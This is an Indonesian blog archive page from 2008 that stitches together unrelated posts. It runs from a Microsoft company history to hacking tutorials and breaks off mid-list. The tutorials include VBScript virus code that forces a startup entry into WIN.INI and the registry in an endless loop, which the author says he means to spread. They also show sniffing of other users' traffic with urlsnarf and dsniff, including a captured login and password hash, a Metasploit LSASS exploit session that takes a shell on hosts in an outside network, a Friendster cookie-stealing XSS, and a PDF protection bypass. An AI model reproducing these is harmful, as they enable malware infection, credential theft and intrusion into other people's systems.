IPTEKCOM: Desember 2008

14 Desember 2008

About Microsoft

US corporation, now the world's largest software supplier. Microsoft's first major product was a version of BASIC, written for the first personal computer, the MITS Altair, in 1975, and adopted by most of the desktop computer industry. Through MS-DOS, written for IBM, Windows, and related applications it has steadily increased its hold on the personal computer market.

Microsoft was founded by Bill Gates and Paul Allen in 1975. Bill Gates was the company's chief executive until January 2000, when he stepped down in order to spend more time on developing new technologies, becoming ‘chief software architect’, but remaining Microsoft's chairman. Steve Ballmer, the company's president since 1998, became chief executive.

Growth

In 1980, when it had a staff of 40, Microsoft was contracted to produce a BASIC and DOS (Disk Operating System) for IBM's first mass market microcomputer, the IBM PC. With the success of the IBM PC, Microsoft grew rapidly to 6,000 staff and a turnover of US$1 billion in 1990, when it launched Windows 3, a hugely successful graphical user interface for DOS. In 1993 Microsoft was voted by Fortune magazine as the ‘most innovative company operating in the US’, and in 1997 in a public poll (carried out by Hart and Teeter), Microsoft was revealed as the ‘most admired’ company in one of the ‘most admired’ industries. With the launch of Windows 95 and Windows 98, and ancillary sales of Windows applications (Word, Excel, Microsoft Office) and CD-ROM programs such as Encarta, Microsoft then grew to more than 20,000 staff, supplied operating systems for around 90% of the world's personal computers, and had a turnover of US$44 billion in 2006. The accompanying growth in the value of the company's shares created three billionaires (Gates, Allen, and Ballmer) while hundreds, perhaps thousands, of Microsoft's programmers have become millionaires.

Federal investigations

A US federal probe into charges that Microsoft was engaging in anticompetitive behaviour was carried out in 1990-93, from which date the US Justice Department launched its own investigations. Under a settlement reached in 1994, Microsoft agreed to end the uncompetitive practice of ‘per processor’ pricing, whereby PC manufacturers paid a fee for each machine produced irrespective of the software to be installed. In 1997, the Justice Department again accused Microsoft of anticompetitive behaviour by tying the installation of Windows 95 to the installation of Microsoft's free Web browser, Internet Explorer.

The fallout from this issue, which relates to Microsoft abusing its monopoly power against Netscape, its main competitor in Internet browsers, is not yet fully resolved. In December 1997, Microsoft was ordered to change its marketing policy. But in June 1998, an appeal court ruled that Microsoft was quite within its rights to combine its Internet browser with its operating system. This judgement was overturned in April 2000. Three months later, a federal judge ruled that the company should be split into two companies, one developing the Windows family of operating systems, and the other concentrating on applications software, such as the Microsoft Office suite of programs (including Word and Excel). Microsoft launched an appeal, and in September, the US Supreme Court ruled the appeal should be heard by a lower appeals court before the ruling was acted upon, allowing Microsoft to continue its business practices unhindered until the case is resolved. In June 2001, the appeals court in Washington, DC, unanimously reversed the order proposed by Judge Thomas Penfield Jackson to divide Microsoft, the world's dominant computer software company, in two. It also criticized the judge for his ‘appearance of partiality’, including making derogatory remarks about the company in media interviews. However, the court did accept the finding that Microsoft was a monopoly, and sent the case to a new judge to find an acceptable solution. In September, the US government said it would no longer seek the break-up of Microsoft. However, the Supreme Court rejected a plea by Microsoft to reverse the ruling that the software giant had broken antitrust laws.

Other developments

In 1996, Microsoft launched another new operating system, Windows CE (Consumer Electronics), for handheld computers, pen-operated personal digital assistants, in-car systems, and similar applications. Suppliers of CE-based HPCs (handheld personal computers) include Casio, Compaq, Hewlett-Packard, Philips, and Sharp. Windows CE version 2 is also used in an improved version of WebTV: a set-top box that enables users to surf the Internet on their television sets. Microsoft purchased WebTV Networks for US$425 million in 1997. The first companies to supply WebTV systems were Philips, Sony, and Mitsubishi. In 2000 Windows CE was renamed Pocket PC. In 2002 Microsoft sponsored the new tablet PC, a model halfway between handheld and notebook PCs, and running under Windows XP Tablet PC Edition. According to Microsoft, the tablet PC version of the operating system offered new, advanced handwriting and speech recognition capabilities, enabling the creation, storage, and transmission of handwritten notes and voice input. In 2007 Microsoft launched Windows Vista, its latest PC operating system and replacement for Windows XP.

13 Desember 2008

Manipulasi File WIN.INI

Masih ingat sama tulisan Sto di buku STH(Hack 1x19),tentang bagaimana menjalankan program secara remote pada komputer korban.Nah bagi para master virus juga pasti udah tau tentang manipulasi File WIN.INI yang terletak pada C:\WINDOWS\WIN.INI.

Selain manipulasi WIN.INI,bisa juga digunakan manipulasi File System.INI,atau manipulasi Registry(Regedit.Exe).Sebelumnya akan saya ceritakan tentang Virus yang pernah saya temukan pada komputer teman saya,ternyata virus itu melakukan manipulasi pada file WIN.INI,yaitu pada bagian Run untuk menjalankan program virus itu tiap kali komputer Starting.Ketika aku mencoba menghapus virusnya ternyata tidak bisa,kemudian aku membuka file WIN.INI dan menghapus bagian Run tadi,Setelah komputer aku Restart Virus yang tadi aku temukan dapat aku delete dengan mudah.Nah dari sini kita dapat memanfaatkan Do...Loop(baca tulisanku yang dulu “Anti Deletion File”),untuk membuat Virus yang kita buat jadi sakti(tereksekusi terus)didalam komputer korban.Gimana caranya?nah lihat script ini aja ntar aku jelasin satu persatu.bagian yang saya pikir kalian semua dah tau akan saya loncati Oke?

Dim syarah,sarah
‘menentukan variabel

Set syarah=createObject(“Scripting.FileSystemObject”)
‘mengeset nilai syarah

set sarah=syarah.CreateTextFile(“C:\WINDOWS\System.tegal”)
‘menciptakan file System dengan extensi tegal(nama dan extensi optional)

sarah.Writeline “[WINDOWS]”
sarah.Writeline “run=C:\Virusmu.vbs”
sarah.Writeline “Load=C:\Virusmu.vbs”
sarah.Writeline “[Intl]”
sarah.Writeline “ICountry=62”
sarah.Writeline “sCountry=Indonesia”
sarah.Writeline “sCurrency=Rp”
sarah.Writeline “sLanguage=Ind”
‘diatas adalah isi dari file System.Tegal

sarah.Close
‘aku pikir kalian pasti tau

Set suci=syarah.GetFile(“C:\WINDOWS\System.tegal”)
‘Memberi nilai pada variabel suci

Do
suci.Copy “C:\WINDOWS\WIN.INI”
‘mengkopikan System.Tegal ke direktori Windows dengan nama WIN.INI(inilah
hebatnya VBS dia dapat ‘dikopikan dengan nama yang lain dan extensinya
dapat dirubah)

Loop
‘ini fungsi Loop yang akan membuat WIN.INI palsu tidak bisa dihapus
sekaligus tidak bisa di edit

‘artinya meski anda berhasil menghapus bagian run-nya,tapi akan tercopy
lagi seperti semula.

Sebenernya script diatas adalah bagian dari Virus yang mau aku sebarkan. Script diatas akan menciptakan File System.Tegal(Optional,bisa pake nama&Extensi apa aja yang penting bisa menipu)yang jelas Ciptakan file dengan extensi terserah anda dalam hal ini saya pake extensi .Tegal(karena ga ada program yang bisa baca Extensi .Tegal).Setelah itu Copykan file itu di Direktory Windows dengan nama WIN.INI(rubah extensinya)File WIN.INI sudah ada akan digantikan dengan File yang anda buat.Manipulasi ini dapat pula dilakukan pada Registry(Regedit.exe).Nih lihat contohnya aja biar jelas

Do
Set sarah=CreateObject(“Wscript.Shell”)
sarah.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Sarah”,
”C:\Virusmu.exe”
Loop

Download mp3 dengan menggunakan trick di radioblogclub

Anda susah mencari lagu yg anda ingin kan melalui downloadÂ dari internetÂ ?, baik lah saya tidak tau article ini sudah di buat atau belom sebelumnya...

Langkal awal ada lah browsing ke http://www.radioblogclub.com lalu register di sana (gak usah bisa juga sih) lalu di search kolom , tulis nama lagu atau artis yg ingin anda download ... lalu muncul lah list dari pencarian tersebut.

Dari list itu arah kan mouse pada lagu or artis yg anda inginkan lalu copy short kan nya example : javascript:openRadio('http://www.titours.be/radio.blog/?autoplay=23') nah paste alamat itu ke kolom alamat di browser anda lalu hilangkan openRadio(' <>?autoplay=23' lalu jadi lah http://www.titours.be/radio.blog/.

Selanjutnya tambahkan ( sounds ) lalu menjadi http://www.titours.be/radio.blog/sounds/ nah anda coba click itu lalu download lah ( file ini di compres menjadi small jadi gak perlu lama mendownloadnya).

contoh ke 2 : http://www.[target].be/radio.blog/ + sounds http://www.[target].be/radio.blog/sounds/

informasi ini di tujukan untuk semua terutama bagi newbie,

Buka Proteksi File PDF dengan menggunakan XPDF Linux Ubuntu dan PDF Creator

Date: Monday, May 15, 2006 Hits: 917 By: kendari_underground

Kita tentunya sering menjumpai file-file dokumen dalam bentuk E-Book (.pdf). Terkadang Buku atau artikel pendek yang mempunyai isi yang sangat bagus kita butuh beberapa baris untuk mengkutip beberapa kalimat dari dokumen tersebut sebagai referensi, dan tentunya mengikuti etika yang berlaku "harus mencantumkan narasumber dari kutipan yang kita gunakan tersebut.

Sebagai warga negara yang sadar akan hukum tentunya niat untuk mencantumkan nama
dari narasumber sudah melekat di dalam sanubari. Seperangkat peralatan untuk melakukan
pengkutipan artikel telah disiapkan mulai dari Adobe Reader hingga Microsoft Word,
Tapi apa gerangan yang terjadi "Copy To Clipboard-nya ko ngga muncul ";
dokumen ternyata diproteksi. Sakit rasanya hati, kaya dicubit gorila (nyontek dari film "Tak Biasa").
Kecanggihan software memang telah memberikan kemudahan kepada penggunanya dalam mengamankan dokumen
dan semakin hebat pula proteksi yang diberikan.

Sekarang Kita butuh 2 aplikasi sebagai senjata untuk membuka proteksi tersebut :

1. xpdf for Linux and

2. PDF Creator Version 0.8.0 (http://www.pdfcreator.de.vu/) for Windows

Kali ini penulis menggunakan 2 sistem operasi untuk menjalankan ke dua aplikasi tersebut
(Linux Ubuntu 5.10 dan Windows XP SP2), di mana dokumen pdf yang terproteksi akan di konversi
menjadi file .ps (postscript) dengan menggunakan xpdf, kemudian file .ps tersebut akan di export
menjadi file pdf dengan menggunakan PDF Creator.

Langkah Pertama

1.Jalankan Sistem operasi Linux Ubuntu dan buka file yang terproteksi tersebut dengan menggunakan aplikasi xpdf.
2.Setelah file tersebut terbuka, print dokumen tersebut ke dalam format ps (postscript)
dengan mengklik logo print pada status bar Aplikasi xpdf tersebut.
3.Jendela Xpdf: Print akan muncul â€“ aktifkan option print to file lalu tentukan lokasi penyimpanan file .ps
[defaultnya, file akan disimpan di mana tempat file pdf tersebut berada].
4.Setelah file tersimpan pada lokasi yang telah ditentukan, akan tercipta satu file baru dengan ekstensi .ps
5.Sampai di sini langkah pertama sudah selesai

Langkah Kedua

Untuk melakukan export file dari .ps ke .pdf kita membutuhkan aplikasi tambahan yaitu PDF creator
yang dapat di download langsung dari situs resminya http://www.pdfcreator.de.vu/.
Penulis mengasumsikan bahwa PDF Creator telah terinstal pada komputer anda.

1.Buka Windows Explorer, cari file yang tadi telah konversi menjadi file .ps, klik kanan,
open with PDF, dan pilih Creator PDF and Bitmap files with Ghostscript
2.Setelah jendela PDF Creator terbuka, isi kolom-kolom tersebut sesuai dengan keinginan anda
3.Sebelum menjalankan proses export, lakukan settingan security pada options PDF creator, klik Tombol Options
4.Pastikan bahwa option Security tidak tercentang, sebab bila di aktifkan file pdf akan tetap terproteksi,
dan semua langkah yang telah kita lakukan akan sia-sia.
5.Klik Tombol Save, kita akan kembali ke jendela PDF Creator.
6.Klik Tombol Save lagi , dan tentukan lokasi penyimpanan file.
7. Sampai di sini langkah kedua sudah selesai. Langkah terakhir adalah melakukan uji hasil.

Langkah Ketiga

1.Buka file pdf yang tadi telah di export oleh PDF Creator dengan menggunakan Adobe Reader atau aplikasi lainya.
Bingo ... dokumen terbebas dari proteksi.
2.Selamat mencoba.

<<<>>>

- Experimen dilakukan pada file pdf yang menggunakan proteksi
- copy text and images
- print the document
- modify the document
- modify comment
- Encription Level : Low (40-bit RC4) & High (128-bit RC4)

- Jika file pdf menggunakan proteksi Document Open Password, teknik di atas tidak akan bisa digunakan.

Iterating Through Multi-Page Results

As buckets can contain a virtually unlimited number of keys, the complete results of a list query can be extremely large. To manage large result sets, Amazon S3 uses pagination to split them into multiple responses. The following pseudo-code procedure demonstrates how to iteratively fetch an exhaustive list of results, given a prefix, marker and delimiter:

Example

Grabbing URL, Sniffing, dan Remote Exploit

Auditor security merupakan sebuah system operasi yang bersifat live-system berbasiskan pada knopix.

Menurut penciptanya yang dituliskan pada http://remote-exploit.org , linux Auditor Security diciptakan untuk
memenuhi kebutuhan para excellent-user yang dikombinasikan dengan toolset yang optimal serta penggunakan
yang user friendly. Program â€“ program open source pada auditor security menawarkan toolset yang komplit
untuk meng-analysis keamanan sebuah system, byte per byte.

Dalam tulisan ini akan dibahas sebagian dari security tool set yang terdapat pada linux Auditor Security.

A. Grabbing URL

Yang dimaksusd grabbing URL adalah mendapatkan alamat URL yang dikunjungi oleh seseorang tanpa ataupun sepengetahuan
dari orang tersebut. Di bawah akan dibahas mengenai grabbing URL pada suatu channel IRC dan pada jaringan lokal yang
terhubung dengan internet.

1. Grabbing URL pada channel IRC

Untuk melakukan grabbing URL pada channel IRC bisa dilakukan dengan menggunkan XCHAT yang telah tersedia secara bult-in
pada linux auditor. Langkah pertama tentu saja kita harus join ke channel tertentu. Setelah join ke channel tertentu
langkah selanjutnya klik tab Windows kemudian pilih URL Grabber. Tunggu beberapa saat, maka jika ada salah satu user yang
tergabung pada channel tersebut membuka sebuah URL, list dari URL Grabber akan bertambah.
Berikut ini hasil grabbing URL yang penulis lakukan pada channel : #hnet, #skb50, #indonona, #echo, #k-elektronik, #bandung
pada server dalnet tanggal 1 September 2005.

ftp.orghttp://echo.or.id
http://irc.jraxis.com/dalnet/default/
http://kline.dal.net/exploits/akills.htm#ma
http://kline.dal.net/exploits/akills.htm#ma)))
http://kline.dal.net/massads/mup.htm
http://kline.dal.net/proxy/
http://miranda-im.org
http://tiongkokmusic.com:2222/listen.pls
http://unut.hollosite.com
http://valueshells.com
http://valueshells.com/disc.html
http://www.dal.net/
http://www.dal.net/aup/
http://www.equinix.net
http://www.kecoak.or.id
http://www.malanghack.net/
http://www.rayofshadow.or.id
http://www.valueshells.com
irc.hackerszone.orgirc.vsnl.com
www.balihack.or.idwww.bandung-dal.net
WwW.BaNdUnG.tKwww.dal.net/proxies
www.jraxis.comwww.malanghack.net
WwW.PsYcHoPeD.InFowww.scoopsite.com
www.superask.netwww.VALUESHELLS.com
www.ValueShells.comwww.valueshells.com
www.valueshells.comwww.w0nk.org
www.zone-h.org/en/defacements/mirror/id=2840693/>
www.zone-h.org/en/defacements/mirror/id=2840696/>

Daftar URL diatas merupakan daftar dari URL-URL yang dikunjungi para chatter pada channel â€“ channel diatas.
Kelemahan dari XCHAT yaitu XCHAT belum mampu secara spesifik mengetahui URL yang dikunjungi tiap chatter.

2. Grabbing URL Pada Jaringan Lokal Yang Terhubung Pada Internet

Selain grabbing URL pada suatu channel IRC kita juga bisa melakukan grabbing URL pada jaringan lokal yang terhubung
pada internet. Untuk melakukanya kita bisa menggunakan URL Snarf. Untuk menjalankan URL Snarf ketikan perintah berikut
pada konsole :

hyraxz@chidori~dove# urlsnarf -i eth0 > ./grabMeBabe.txt

Setelah URL Snarf berhasil dijalankan maka tugas kita selanjutnya adalah tinggal tidur dan membuka hasil grabbing
keesokan hari.Berikut ini satu baris potongan dari hasil grabbing URL yang berhasil penulis capture, penulis hanya
menunjukan 1 baris dari 994 baris hasil grabbing yang didapat mulai dari jam 00:15:37 sampai 06:21:10 pada
tanggal 02/Sep/2005.

192.168.10.5 - - [02/Sep/2005:05:38:37 -0400] "GET http://www.friendster.com/friendrequests.php?lastact=approve&sc=933
HTTP/1.1" - - "http://www.friendster.com/friendrequests.php?statpos=homealerts" "Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.7.5) Gecko/20041128 Firefox/1.0 (Debian package 1.0-4)"

Dari hasil grabbing tersebut maka kita bisa mengambil suatu analisa bahwa komputer dengan IP 192.168.10.5
pada [02/Sep/2005:05:38:37 -0400] dengan menggunakan methode GET sedang mengakses www.friendster.com dan kemungkinan
besar user tersebut sedang meng-approve friend request. Sangat dimungkinkan browser dari user tersebut adalah
Mozzila/5.0 dengan mamakai sistem operasi linux.

B. Sniffing Menggunakan DSNIFF

Sniffing merupakan usaha yang dilakukan untuk memperoleh suatu informasi tertentu dalam suatu network dangan jalan
meng-capture paket â€“ paket data yang ada pada suatu network dan kemudian menganalisinya untuk diambil informasinya
yang dianggap penting. Dsiniff merupakan suatu tool sniffing yang telah tersedia pada linux auditor security.
Untuk memulai sniffing ketikan perintah berikut ini:

hyraxz@chidori~dove# dsniff â€“i eth0 â€“W /mnt/hda5/passwd_HhAN.db

perintah diatas akan memerintahkan dsniff untuk meng-capture paket - paket yang melintasi eth0 dan menuliskan hasilnya
pada sebuah file dengan nama passwd_HhAN.db yang disimpan pada directory /mnt/hda5/.
Untuk membaca hasilnya gunakan perintah berikut ini:

hyraxz@chidori~ dove# dsniff -r /mnt/hda5/passwd_HhAN.db

Atau kalau kita ingin merubahnya dalam format ASCII sehingga file tersebut bisa dibuka menggunakan notepad saat di Windows,
ketik perintah berikut :

hyraxz@chidori~dove# dsniff -r /mnt/hda5/passwd_HhAN.db > /mnt/hda5/GetDownEnemy.txt

Berikut ini merupakan file ASCII hasil dari sniffing yang berhasil penulis documentasikan :

09/02/05 04:58:42 tcp 192.168.10.7.1183 -> p2.rd.scd.yahoo.com.80 (http)GET
/reg/login1/newym_nouc/lisu/login/us/ym/*http://login.yahoo.com/config/login?.tries=1&.src=ym&.md5=&.hash=&.js=1&.
last=&promo=&.intl=us&.bypass=&.partner=&.u=b261flt1heuai&.v=0&.challenge=Ymjr9vf35ZRMTV9YkEFy0vhTsQz0&.yplus=&.
emailCode=&pkg=&stepid=&.ev=&hasMsgr=1&.chkP=Y&.done=http%3A//mail.yahoo.com&login=rip_zombie
&passwd=ace61b359fa543aceccf111dbd767e74&.persistent=&.hash=1&.md5=1 HTTP/1.1Host: us.rd.yahoo.com

Berikut analysis dari hasil sniffing di atas:
1. Sniffing dilakukan pada tgl 02 September 2005 jam 04:58:42. Sniffing dilakukan pada koneksi TCP antara host dengan
IP 192.168.10.7:1183 dengan server yahoo pada p2.rd.scd.yahoo.com:80 denagan memakai protokol HTTP.
2. User Name untuk login ke server e-mail dari user tersebut adalah rip_zombie dengan password hasil enkripsi
MD5 â€œace61b359fa543aceccf111dbd767e74â€ (tanpa tanda petik).
3. Server mail yahoo menggunakan methode enkripsi MD5.

C. Remote Exploit

Remote exploit adalah suatu program yang dijalankan pada computer attacker, digunakan untuk menginjeksi komputer target
sehingga attacker memperoleh hak akses lebih dari yang diijinkan tanpa ataupun sepengetahuan dari korban.
Linux Auditor Security menyediakan tool tersebut dengan nama Metasploit.

Menyusup di Jaringan SKB50 Menggunakan Metasploit

Sebelum memulainya tentu saja komputer attaccker harus di set IP-nya sesuai dengan IP dari jaringan SKB50. berikut ini
konfigurasi IP dari komputer attacker yang telah disesuaikan dengan konfigurasi IP pada jaringan SKB50.

hyraxz@chidori~dove# ifconfig â€“eth0 192.168.0.10 netmask 255.255.255.0
hyraxz@chidori~dove# ifconfig
eth0 Link encap:Ethernet HWaddr 00:E0:18:F3:9A:D0
inet addr:192.168.0.10 Bcast:192.168.0.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:712 errors:0 dropped:0 overruns:0 frame:0
TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:69398 (67.7 KiB) TX bytes:595 (595.0 b)
Interrupt:5 Base address:0x9800

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:10 errors:0 dropped:0 overruns:0 frame:0
TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:500 (500.0 b) TX bytes:500 (500.0 b)

Selanjutnya ketikan perintah dibawah ini untuk memanggil console metasploit :

hyraxz@chidori~dove# cd /opt/auditor/metasploit
hyraxz@chidori~dove# ./msfconsole

jika berhasil maka akan muncul tulisan seperti berikut ini :

888 888 d8b888
888 888 Y8P888
888 888 888
88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888
888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888
888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
888
888
888
+ -- --=[ msfconsole v2.4 [75 exploits - 75 payloads]

msf >

untuk memulai penggunakanya ketikan perintah-perintah dibawah ini:

msf > show exploits

Metasploit Framework Loaded Exploits
====================================

3com_3cdaemon_ftp_overflow

3Com 3CDaemon FTP Server Overflow

Credits

afp_loginext

aim_goaway

apache_chunked_win32

arkeia_agent_access

arkeia_type77_macos

arkeia_type77_win32

backupexec_ns

bakbone_netvault_heap

blackice_pam_icq

cabrightstor_disco

cabrightstor_disco_servicepc

cabrightstor_uniagent

calicclnt_getconfig

calicserv_getconfig

distcc_exec

exchange2000_xexch50

globalscapeftp_user_input

ia_webmail

icecast_header

iis40_htr

iis50_printer_overflow

iis50_webdav_ntdll

iis_fp30reg_chunked

iis_nsiislog_post

iis_source_dumper

iis_w3who_overflow

imail_imap_delete

imail_ldap

irix_lpsched_exec

lsass_ms04_011

maxdb_webdbm_get_overflow

mercantec_softcart

minishare_get_overflow

msasn1_ms04_007_killbill

msmq_deleteobject_ms05_017

msrpc_dcom_ms03_026

mssql2000_preauthentication

mssql2000_resolution

netterm_netftpd_user_overflow

openview_omniback

oracle9i_xdb_ftp

oracle9i_xdb_ftp_pass

payload_handler

poptop_negative_read

realserver_describe_linux

samba_nttrans

samba_trans2open

samba_trans2open_osx

samba_trans2open_solsparc

sambar6_search_results

seattlelab_mail_55

sentinel_lm7_overflow

servu_mdtm_overflow

smb_sniffer

solaris_dtspcd_noir

solaris_kcms_readfile

solaris_lpd_exec

solaris_sadmind_exec

solaris_snmpxdmid

solaris_ttyprompt

squid_ntlm_authenticate

svnserve_date

trackercam_phparg_overflow

uow_imap4_copy

uow_imap4_lsub

ut2004_secure_linux

ut2004_secure_win32

warftpd_165_pass

warftpd_165_user

webstar_ftp_user

windows_ssl_pct

wins_ms04_045

wsftp_server_503_mkd

Metasploit Framework Credits

AppleFileServer LoginExt PathName Overflow

AOL Instant Messenger goaway Overflow

Apache Win32 Chunked Encoding

Arkeia Backup Client Remote Access

Arkeia Backup Client Type 77 Overflow (Mac OS X)

Arkeia Backup Client Type 77 Overflow (Win32)

Veritas Backup Exec Name Service Overflow

BakBone NetVault Remote Heap Overflow

ISS PAM.dll ICQ Parser Buffer Overflow

CA BrightStor Discovery Service Overflow

CA BrightStor Discovery Service SERVICEPC Overflo

CA BrightStor Universal Agent Overflow

CA License Client GETCONFIG Overflow

CA License Server GETCONFIG Overflow

DistCC Daemon Command Execution

Exchange 2000 MS03-46 Heap Overflow

GlobalSCAPE Secure FTP Server user input overflow

IA WebMail 3.x Buffer Overflow

Icecast (<= 2.0.1) Header Overwrite (win32)

IIS 4.0 .HTR Buffer Overflow

IIS 5.0 Printer Buffer Overflow

IIS 5.0 WebDAV ntdll.dll Overflow

IIS FrontPage fp30reg.dll Chunked Overflow

IIS nsiislog.dll ISAPI POST Overflow

IIS Web Application Source Code Disclosure

IIS w3who.dll ISAPI Overflow

IMail IMAP4D Delete Overflow

IMail LDAP Service Buffer Overflow

Irix lpsched Command Execution

Microsoft LSASS MSO4-011 Overflow

MaxDB WebDBM GET Buffer Overflow

Mercantec SoftCart CGI Overflow

Minishare 1.41 Buffer Overflow

Microsoft ASN.1 Library Bitstring Heap Overflow

Microsoft Message Queueing Service MSO5-017

Microsoft RPC DCOM MSO3-026

MSSQL 2000/MSDE Hello Buffer Overflow

MSSQL 2000/MSDE Resolution Overflow

NetTerm NetFTPD USER Buffer Overflow

HP OpenView Omniback II Command Execution

Oracle 9i XDB FTP UNLOCK Overflow (win32)

Oracle 9i XDB FTP PASS Overflow (win32)

Metasploit Framework Payload Handler

Poptop Negative Read Overflow

RealServer Describe Buffer Overflow

Samba Fragment Reassembly Overflow

Samba trans2open Overflow

Samba trans2open Overflow (Mac OS X)

Samba trans2open Overflow (Solaris SPARC)

Sambar 6 Search Results Buffer Overflow

Seattle Lab Mail 5.5 POP3 Buffer Overflow

SentinelLM UDP Buffer Overflow

Serv-U FTPD MDTM Overflow

SMB Password Capture Service

Solaris dtspcd Heap Overflow

Solaris KCMS Arbitary File Read

Solaris LPD Command Execution

Solaris sadmind Command Execution

Solaris snmpXdmid AddComponent Overflow

Solaris in.telnetd TTYPROMPT Buffer Overflow

Squid NTLM Authenticate Overflow

Subversion Date Svnserve

TrackerCam PHP Argument Buffer Overflow

University of Washington IMAP4 COPY Overflow

University of Washington IMAP4 LSUB Overflow

Unreal Tournament 2004 "secure" Overflow (Linux)

Unreal Tournament 2004 "secure" Overflow (Win32)

War-FTPD 1.65 PASS Overflow

War-FTPD 1.65 USER Overflow

WebSTAR FTP Server USER Overflow

Microsoft SSL PCT MS04-011 Overflow

Microsoft WINS MS04-045 Code Execution

WS-FTP Server 5.03 MKD Overflow

msf > use lsass_ms04_011
msf lsass_ms04_011 > show payloads

Metasploit Framework Usable Payloads
====================================

win32_adduser

win32_bind

win32_bind_dllinject

win32_bind_meterpreter

win32_bind_stg

win32_bind_stg_upexec

win32_bind_vncinject

win32_exec

win32_passivex

win32_passivex_meterpreter

win32_passivex_stg

win32_passivex_vncinject

win32_reverse

win32_reverse_dllinject

win32_reverse_meterpreter

win32_reverse_ord

win32_reverse_ord_vncinject

win32_reverse_stg

win32_reverse_stg_upexec

win32_reverse_vncinject

Windows Execute net user /ADD

Windows Bind Shell

Windows Bind DLL Inject

Windows Bind Meterpreter DLL Inject

Windows Staged Bind Shell

Windows Staged Bind Upload/Execute

Windows Bind VNC Server DLL Inject

Windows Execute Command

Windows PassiveX ActiveX Injection Payload

Windows PassiveX ActiveX Inject Meterpreter Payload

Windows Staged PassiveX Shell

Windows PassiveX ActiveX Inject VNC Server Payload

Windows Reverse Shell

Windows Reverse DLL Inject

Windows Reverse Meterpreter DLL Inject

Windows Staged Reverse Ordinal Shell

Windows Reverse Ordinal VNC Server Inject

Windows Staged Reverse Shell

Windows Staged Reverse Upload/Execute

Windows Reverse VNC Server Inject

msf lsass_ms04_011 > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf lsass_ms04_011(win32_bind) > set RHOST 192.168.0.27
RHOST -> 192.168.0.27
msf lsass_ms04_011(win32_bind) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------ ------------ ------------------
required RHOST 192.168.0.19 The target address
required RPORT 139 The target port

Payload: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC thread Exit technique: "process", "thread", "seh"
required LPORT 4444 Listening port for bind shell

Target: Automatic

msf lsass_ms04_011(win32_bind) > exploit
RHOST -> 192.168.0.27
msf lsass_ms04_011(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Detected a Windows XP target (KICKS)
[*] Windows XP may require two attempts
[*] Sending 8 DCE request fragments...
[*] Sending the final DCE fragment
[*] Got connection from 192.168.0.10:1382 <-> 192.168.0.27:4444

C:\WINDOWS\system32> netstat -a
netstat -a

Active Connections

Protocol

Local Address

Foreign Address

State

TCP

UDP

kicks:epmap

kicks:microsoft-ds

kicks:1025

kicks:1056

kicks:1090

kicks:1095

kicks:1098

kicks:1130

kicks:4444

kicks:5000

kicks:netbios-ssn

kicks:1162

kicks:1169

kicks:4444

kicks:microsoft-ds

kicks:isakmp

kicks:ntp

kicks:1900

kicks:ntp

kicks:netbios-ns

kicks:netbios-dgm

kicks:1900

0.0.0.0:0

192.168.0.10:1382

*:*

LISTENING

ESTABLISHED

^c
Caught interrupt, exit connection? [y/n]y
msf lsass_ms04_011(win32_bind) >

Analisa dari hasil aktivitas diatas adalah sebagai berikut :
metasploit meng-attack korban melalui port 139 kemudian memasukan payload yang akan membangun hubungan antara korban
dengan attacker dengan menggunakan mode koneksi TCP, dimana hubungan dilakukan melalui port 4444 pada sisi korban
dan port 1382 pada sisi attacker.Setelah bind port antara attacker dengan korban terbentuk maka attacker menguasai
sepenuhnya aktifitas dari komputer korban. Dari 12 komputer yang hidup saat analisa dilakukan pada jaringan lokal
SKB50 6 buah komputer mampu di tembus dengan menggunakan metasploit, ini berarti bahwa 50% jaringan SKB50 pada saat
itu ada di tangan attacker ;).

XSS Pada Friendster

Date: Thursday, May 25, 2006 Hits: 65 By: LEQHI

Setelah demam Friendster merebak,banyak hacker mencari celah untuk menebus web tersebut.

Sudah ada beberapa contoh dalam article di jasakom yang mendapatkan celah pada web Friendster.com XSS memang tdk dpt dihindari bila web memperbolehkan semua orang mengirim/menerima sesuatu dalam bentuk html code.Seperti Friendster,mereka memperbolehkan meng-edit page mereka sndiri dengan html code.Dan Testimonial,juga diperbolehkan menggunakan html code.
Langsung saja

Browse
1.http://www.Friendster.com
2.login
3.Kirimkan Testimonial Kepada Siapapun dengan code Language="JavaScript">alert(document.cookie)

Kemudian apa yang muncul..cookie dari web Friendster yang tesimpan di komputer kita Bila kita ingin jahat,maka curi saja cookienya.Maka cooki dari setiap org yang mengakses web tersebut secara otomastis akan masuk ke dalam page "curian" yang telah kita buat.

Cara Mudah Melawan Semua Virus Local Tanpa Antivirus

Setelah merasa senang (?!?!) akan hadirnya anak-anak bangsa yang sudah mulai jago bikin virus, akhirnya bosen juga..... abisan gitu-gitu doang. Contoh : Kangen, Riyani Jangkaru, Brontok, trus Romantic Devil. Ah itu mah cemen abis.

Caranya gampang siapin aja :
1. Virusnya (kalo gak punya, bisa minta ama warnet2 terdekat hohoho)
2. Hijack Tools yang bs di download di
http://www.spywareinfo.com/~merijn/downloads.html
3. Tidak diperlukan keahlian yang amat sangat.

Ternyata virus-virus local emang memiliki ciri yang sangat khas diantaranya mendisablekan run, regedit, task manager, sama search. Untuk brontok penduplikatan diri hanya berbatas penduplikatan file .EXE tapi kalo Romantic Devils lebih canggih, virus ini selain menduplikatkan diri juga mengirimkan string ke registry seiring penduplikatannya itu, tapi cuman butuh 10 menit buatlinnya hohoho.

Oke langsung saja :

1. Aktifin HijackThis

2. Trus cari :

